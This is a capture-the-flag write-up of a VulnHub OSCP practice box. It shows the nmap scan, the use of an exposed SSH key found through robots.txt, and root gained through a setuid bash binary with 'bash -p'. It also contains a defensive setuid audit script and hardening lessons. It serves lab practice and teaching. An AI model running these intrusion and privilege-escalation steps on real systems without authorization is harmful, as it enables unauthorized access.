I did this box for the OSCP voucher giveaway back in July. I had to wait until the contest was over. I was not one of the lucky winners. :'( Good experience nonetheless.
Scanning and Enumeration
The first step is always an nmap scan:
sudo nmap -sV -sC 10.0.2.4
This scan was hella fast, which saved me the time of enumerating directories with Gobuster.
sudo nmap -sV -T4 -p- -oN 10.0.2.4
Starting Nmap 7.80 ( https://nmap.org ) at 2020-07-18 11:07 EDT
Nmap scan report for 10.0.2.4
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
Nmap done: 1 IP address (1 host up) scanned in 6.08 seconds
Gaining access via SSH
Since the scan came back so fast, I didn’t even have a chance to go look for a robots.txt file which would have been my first move after starting a Gobuster scan. In the nmap scan, there is a secret.txt file.
I downloaded and opened the secret.txt file; it's base64. At first I thought it was a certificate missing the comments at the beginning and end. I tried adding those and SSHing, but it didn't work, so I tried decoding the base64 and it turned out to be the certificate, which I then used to SSH. I guessed the oscp user because that is the user that appeared on the VM's login screen. I did try root@ first, which did not work:
cat secret.txt | base64 -d > key
chmod 600 key
ssh -i key oscp@10.0.2.4
Enumerating for Privilege Escalation
Once I am in the box I run id and I am a user named oscp without root.
id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
Next I check for access to:
- /root directory. Nope, not so lucky.
- /home directory. There is one directory for a user named oscp.
I checked out the contents of /home/oscp and found an ip file. This file was owned by root and I was thinking this would be a file run by a cron job maybe, but that didn't pan out. If there was something there I missed it.
ls -la /home/oscp
-rwxr-xr-x 1 root root 88 Jul 18 11:04 ip
Next I downloaded my favorite Linux enumeration script: Linux Smart Enumeration. Sometimes you have to start a Python server on your machine to do this, but this time I was able to get it directly from GitHub.
I gave the script proper permissions and ran it. The output is enormous so I’m only including what immediately stuck out to me and ended up being the answer:
chmod +x lse.sh
./lse.sh
[!] fst020 Uncommon setuid binaries........................................ yes!
---
/usr/bin/bash
Getting Root Flag
Once I see setuid binaries, I head over to GTFOBins.
I didn’t have a password and could not use sudo so I tried:
sh -c 'cp $(which bash) .; chmod +s ./bash'
./bash -p
I was still unprivileged oscp. :(
After re-reading the GTFOBins notes which I should have done in the first place: “To exploit an existing SUID binary skip the first command and run the program using its original path”, I tried:
/usr/bin/bash -p
id
uid=1000(oscp) gid=1000(oscp) euid=0(root) egid=0(root) groups=0(root),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd),1000(oscp)
ls /root
fix-wordpress flag.txt snap
cat /root/flag.txt
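The lse.sh finding above (a setuid bit on /usr/bin/bash, which is why bash -p came back with euid=0) is something you can audit for on your own hosts. This is an added example, not part of the original writeup: it lists every setuid file under a root and reports those missing from a constructed baseline allow-list, using a throwaway directory tree built to mimic the box instead of a live system.

```sh
#!/bin/sh
# Added example (not from the original writeup): report setuid files that
# are not on an approved baseline. Uses a constructed baseline and a temp
# tree standing in for "/", so it runs as an unprivileged user.

# Approved setuid binaries, one path per line (constructed for this demo;
# on a real host derive it from a known-good image of the same release).
BASELINE="/usr/bin/passwd
/usr/bin/sudo
/usr/bin/su"

# Print each setuid regular file under $1 whose path (relative to $1) is
# not in BASELINE. -perm -4000 matches files with the setuid bit set,
# whatever the other permission bits are.
find_unexpected_setuid() {
    root="$1"
    find "$root" -xdev -type f -perm -4000 2>/dev/null | while read -r f; do
        rel=${f#"$root"}
        if ! printf '%s\n' "$BASELINE" | grep -qxF -- "$rel"; then
            printf '%s\n' "$rel"
        fi
    done
}

# Build a throwaway tree mimicking the box: passwd (expected), a setuid
# copy of bash (unexpected, as lse.sh flagged) and ls (no setuid bit).
# No root needed: you may set the setuid bit on files you own.
build_demo_tree() {
    d="$(mktemp -d)"
    mkdir -p "$d/usr/bin"
    : > "$d/usr/bin/passwd"; chmod 4755 "$d/usr/bin/passwd"
    : > "$d/usr/bin/bash";   chmod 4755 "$d/usr/bin/bash"
    : > "$d/usr/bin/ls";     chmod 0755 "$d/usr/bin/ls"
    printf '%s\n' "$d"
}

demo_root="$(build_demo_tree)"
find_unexpected_setuid "$demo_root"   # prints /usr/bin/bash
rm -rf "$demo_root"
```

Anything it reports should be checked against the package that owns the file and, if the bit is not legitimate, cleared with chmod u-s.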
- If you find base64, try decoding it before trying anything else with it.
- Read the details for exploits you are using; don't just start copying and pasting stuff without understanding.
- Ensure you have not misconfigured binaries with suid.
- Don't leave SSH keys exposed.
Try the VulnHub Infosec Prep OSCP box